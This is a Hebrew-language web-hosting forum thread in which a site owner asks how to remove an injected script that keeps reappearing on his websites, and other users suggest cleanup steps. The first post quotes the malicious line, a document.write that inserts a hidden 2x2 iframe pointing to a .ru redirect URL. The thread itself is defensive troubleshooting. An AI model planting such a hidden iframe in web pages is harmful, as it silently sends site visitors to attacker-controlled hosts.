בעיה|וירוס באתר - הוסטס

Mishel · 12-07-12, 14:45

שלום, יש לי בעיה בכמה אתרים שלי, ברובם יש וירוסים, לאחר שדיברתי עם כמה אנשים אמרו לי שזה בא מהמחשב שלי ושאני מתחבר לFTP זה פשוט מדביק את כל האתרים, עכשיו בקיצור הם שלחו לי גם
מסמך טקסט עם קישורים איפה הוירוס נמצא וניקיתי הכל, לאחר מכן התגלו שוב וירוסים ולהפתעתי פתחתי את כל הקבצים של האתר (הכל כולל הכל, גם CSS, גם JS פשוט הכל!) ולא הייתה שורה אחד של הוירוס, אבל שמסתכלים בקוד מקור עדיין רואים את הקוד.

מה אני יכול לעשות? לפי מה שהבנתי האנטי וירוס NOD חוסם את האתר שלי ואני בטוח שגם גוגל מזהיר, מה הפיתרון?

השורה של הוירוס:

ציטוט:

document.write('<iframe src="http://flip sph ere .ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

(אם נכנסים לקישור זה מעביר לBING)

לפי מה שהבנתי זאת בעיה מאוד ידועה היום והרבה בעלי אתרים נתקלים בה, וגם למיטב הבנתי האנטי וירוס לא מתמודד עם הוירוס הזה.

מה אפשר לעשות?

**IgalSt** · 12-07-12, 15:19

לפני שמתחילים, חשוב לנקות את המחשב שלך מוירוסים כדי שהפעולות שלך לא יהיו לריק.

לאחר מכן, עליך להוריד את InfoRapid Search & Replace (או כל תוכנה דומה אחרת)..
השתמש בתוכנה הזאת על מנת להריץ חיפוש והחלפה בקבצים החשודים כנגועים.
עליך לחפש את הקוד שהוירוס שתל בעמודים שלך, ולהחליף אותו בשום דבר (כלומר סטרינג ריק).

כשאתה מסיים, העלה את הקבצים לשרת.

Mishel · 12-07-12, 16:24

ציטוט:

נכתב במקור על ידי IgalSt

לפני שמתחילים, חשוב לנקות את המחשב שלך מוירוסים כדי שהפעולות שלך לא יהיו לריק.

לאחר מכן, עליך להוריד את InfoRapid Search & Replace (או כל תוכנה דומה אחרת)..
השתמש בתוכנה הזאת על מנת להריץ חיפוש והחלפה בקבצים החשודים כנגועים.
עליך לחפש את הקוד שהוירוס שתל בעמודים שלך, ולהחליף אותו בשום דבר (כלומר סטרינג ריק).

כשאתה מסיים, העלה את הקבצים לשרת.

המחשב שלי כבר עבר סריקה, כרגע אני מוריד את התוכנה שהצעת, אני פשוט מכניס לתוכנה את הקבצים ומה אז?

ותודה רבה

עריכה: לא חושב שהוירוס הוסר מהמחשב, אמרו לי לפרמט אבל זה בעיה גדולה עכשיו, אין דרך אחרת?

**IgalSt** · 12-07-12, 20:27

ציטוט:

נכתב במקור על ידי Wekey

המחשב שלי כבר עבר סריקה, כרגע אני מוריד את התוכנה שהצעת, אני פשוט מכניס לתוכנה את הקבצים ומה אז?

ותודה רבה

עריכה: לא חושב שהוירוס הוסר מהמחשב, אמרו לי לפרמט אבל זה בעיה גדולה עכשיו, אין דרך אחרת?

אם יש לך וירוס במחשב שכל פעם "מדביק" את הקבצים כשאתה מנקה אותם, נשמע כאילו שאכן אין דרך אחרת.
מה שכן, הייתי שוקל להשתמש במחשב חלופי על מנת לנקות את הקבצים ולהעלותם לשרת על מנת לחזור לפעילות סדירה ASAP.

בניה · 12-07-12, 21:33

תנסה לסרוק את המחשב עם MALWARE BYTES, הסיר לי משהו דומה
כמו כן, אפשר להשתמש בGOOGLE DEVELOPER TOOLS כדי להבין אילו קבצים נגועים ולבקש מגוגל לסרוק מחדש כדי שיסירו את ההזהרה בכניסה לדומיין שלך

Mishel · 12-07-12, 22:36

ציטוט:

נכתב במקור על ידי IgalSt

אם יש לך וירוס במחשב שכל פעם "מדביק" את הקבצים כשאתה מנקה אותם, נשמע כאילו שאכן אין דרך אחרת.
מה שכן, הייתי שוקל להשתמש במחשב חלופי על מנת לנקות את הקבצים ולהעלותם לשרת על מנת לחזור לפעילות סדירה ASAP.

אבל איך לנקות את הקבצים? חלקם עם מערכות ווורדפרס וגם שאני פותח קובץ קובץ אני לא מוצא את הנגועים.. בעיה גדולה.

ציטוט:

נכתב במקור על ידי בניה

תנסה לסרוק את המחשב עם MALWARE BYTES, הסיר לי משהו דומה
כמו כן, אפשר להשתמש בGOOGLE DEVELOPER TOOLS כדי להבין אילו קבצים נגועים ולבקש מגוגל לסרוק מחדש כדי שיסירו את ההזהרה בכניסה לדומיין שלך

סרקתי איתה כל הלילה ומצאה כמה מזיקים, הסרתי אותם, ובקשר לגוגל - נכנסתי לכלי מנהל האתרים אבל לא מצאתי בשום מקום רשימה של הקבצים הנגועים..

עריכה: מוזר מאוד, נכנסתי ל"אחזר כמו גוגל", הוא סיים את הפעולה ואז הוציא את הקוד מקור של האתר, אני רואה את השורה של הוירוס אבל אין אזהרה ואין כלום, גם שנכנסים ל"תוכנה זדונית".

**IgalSt** · 13-07-12, 12:14

ציטוט:

נכתב במקור על ידי Wekey

אבל איך לנקות את הקבצים? חלקם עם מערכות ווורדפרס וגם שאני פותח קובץ קובץ אני לא מוצא את הנגועים.. בעיה גדולה.

הרי לא סביר שתעבור על עשרות קבצים ידנית. זו בדיוק הסיבה שבגללה הבאתי לך את התונכה שיודעת לחפש בכל קבצים ממש מהר ולהחליף את התוכן שאתה מחפש במשהו אחר. השתמש בה.

ציטוט:

נכתב במקור על ידי Wekey

סרקתי איתה כל הלילה ומצאה כמה מזיקים, הסרתי אותם, ובקשר לגוגל - נכנסתי לכלי מנהל האתרים אבל לא מצאתי בשום מקום רשימה של הקבצים הנגועים..

עריכה: מוזר מאוד, נכנסתי ל"אחזר כמו גוגל", הוא סיים את הפעולה ואז הוציא את הקוד מקור של האתר, אני רואה את השורה של הוירוס אבל אין אזהרה ואין כלום, גם שנכנסים ל"תוכנה זדונית".

ייתכן ולא כל תוכנות האנטיוירוס מזהות את זה כקוד זדוני. אבל זה בהחלט אחד כזה ואתה צריך לטפל בבעיה.

BuildDream · 13-07-12, 13:57

כשאתה אומר שסרקת את כל הקבצי PHP, HTML של האתר שלך ולא ראית שום קוד זדוני - זה לא אומר שהוא לא קיים באתר
יש כ"כ הרבה אפשרויות להוסיף קוד לאתר - למשל בphp.ini אתה יכול להגדיר קוד שיתווסף אוטומטית אחרי/לפני כל דף שהוא מפרסר. וזאת רק דרך אחת מאלף.

וזה שיש לך שורות קוד שלא אתה כתבת באתר זה לא מחייב שזה וירוס, ובגלל זה יכול להיות שהוא לא רושם לך התראה על זה..
יש קודים שרק אוספים מידע, שותלים פרסומות וכל מיני דברים כאלה ולא מכילים וירוסים.

יכול להיות שזה וירוס במחשב שלך, ויכול להיות גם שהשרת שלך נפרץ ובכל פעם שמים לך קודים כאלה. יש המון דרכים לשתול קוד באתרים

Mishel · 13-07-12, 14:34

ציטוט:

נכתב במקור על ידי BuildDream

כשאתה אומר שסרקת את כל הקבצי PHP, HTML של האתר שלך ולא ראית שום קוד זדוני - זה לא אומר שהוא לא קיים באתר
יש כ"כ הרבה אפשרויות להוסיף קוד לאתר - למשל בphp.ini אתה יכול להגדיר קוד שיתווסף אוטומטית אחרי/לפני כל דף שהוא מפרסר. וזאת רק דרך אחת מאלף.

וזה שיש לך שורות קוד שלא אתה כתבת באתר זה לא מחייב שזה וירוס, ובגלל זה יכול להיות שהוא לא רושם לך התראה על זה..
יש קודים שרק אוספים מידע, שותלים פרסומות וכל מיני דברים כאלה ולא מכילים וירוסים.

יכול להיות שזה וירוס במחשב שלך, ויכול להיות גם שהשרת שלך נפרץ ובכל פעם שמים לך קודים כאלה. יש המון דרכים לשתול קוד באתרים

זה היה טעות שלי, הוירוס בא ממני, פשוט לאחר שאני מוחק את השורות של הוירוס והם אני לא רואה אותם הם חוזרים שוב.
ובקשר לשרת - לא, נעשו בדיקות מקיפות עם 2 טכנאים על הדברים האלה.

בכל מקרה כרגע אני מנקה את כל האתרים עם התוכנה שיגאל נתן.

תודה רבה לכולם.

12-07-12, 15:19	# 2
IgalSt מנהל פורום, עסק רשום מיני פרופיל תאריך הצטרפות: Oct 2005 מיקום: המרכז גיל: 38 הודעות: 1,432	לפני שמתחילים, חשוב לנקות את המחשב שלך מוירוסים כדי שהפעולות שלך לא יהיו לריק. לאחר מכן, עליך להוריד את InfoRapid Search & Replace (או כל תוכנה דומה אחרת).. השתמש בתוכנה הזאת על מנת להריץ חיפוש והחלפה בקבצים החשודים כנגועים. עליך לחפש את הקוד שהוירוס שתל בעמודים שלך, ולהחליף אותו בשום דבר (כלומר סטרינג ריק). כשאתה מסיים, העלה את הקבצים לשרת. __________________ יגאל סטקלוב Igal Steklov Slides מה השעה? טרקלין דן טרמינל 1

12-07-12, 21:33	# 5
בניה משתמש - היכל התהילה מיני פרופיל תאריך הצטרפות: Oct 2005 מיקום: נחושה הודעות: 3,434	תנסה לסרוק את המחשב עם MALWARE BYTES, הסיר לי משהו דומה כמו כן, אפשר להשתמש בGOOGLE DEVELOPER TOOLS כדי להבין אילו קבצים נגועים ולבקש מגוגל לסרוק מחדש כדי שיסירו את ההזהרה בכניסה לדומיין שלך __________________ קו ישר, כי אפשר גם אחרת

13-07-12, 13:57	# 8
BuildDream עסק רשום [?] מיני פרופיל תאריך הצטרפות: Oct 2010 הודעות: 527	כשאתה אומר שסרקת את כל הקבצי PHP, HTML של האתר שלך ולא ראית שום קוד זדוני - זה לא אומר שהוא לא קיים באתר יש כ"כ הרבה אפשרויות להוסיף קוד לאתר - למשל בphp.ini אתה יכול להגדיר קוד שיתווסף אוטומטית אחרי/לפני כל דף שהוא מפרסר. וזאת רק דרך אחת מאלף. וזה שיש לך שורות קוד שלא אתה כתבת באתר זה לא מחייב שזה וירוס, ובגלל זה יכול להיות שהוא לא רושם לך התראה על זה.. יש קודים שרק אוספים מידע, שותלים פרסומות וכל מיני דברים כאלה ולא מכילים וירוסים. יכול להיות שזה וירוס במחשב שלך, ויכול להיות גם שהשרת שלך נפרץ ובכל פעם שמים לך קודים כאלה. יש המון דרכים לשתול קוד באתרים __________________ BuildDream בניית אתרי אינטרנט לשירותך. עסק רשום במס הכנסה ומספק קבלות כחוק. www.BuildDream.co.il - www.iBuild.co.il


	ההרשמה לפורום נפתחה - אפשרות רישום לכל אימייל (דומיינים פרטיים, gmail, הוטמייל..)!

חברים פעילים הצופים באשכול זה: 1 (0 חברים ו- 1 אורחים)